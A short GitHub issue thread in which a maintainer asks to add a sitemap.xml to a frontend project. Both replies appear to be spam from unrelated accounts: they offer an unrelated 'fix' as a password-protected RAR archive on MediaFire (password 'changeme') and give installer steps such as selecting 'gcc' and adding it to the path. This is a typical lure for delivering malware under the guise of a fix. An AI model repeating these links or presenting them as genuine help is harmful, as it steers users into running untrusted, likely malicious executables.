### ISSUE TITLE
Sitemap

### ISSUE THREAD

**Issue by mrharpo** [WGBH-MLA/ov-frontend#73]
# Sitemap
Add a `sitemap.xml` for web scrapers

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
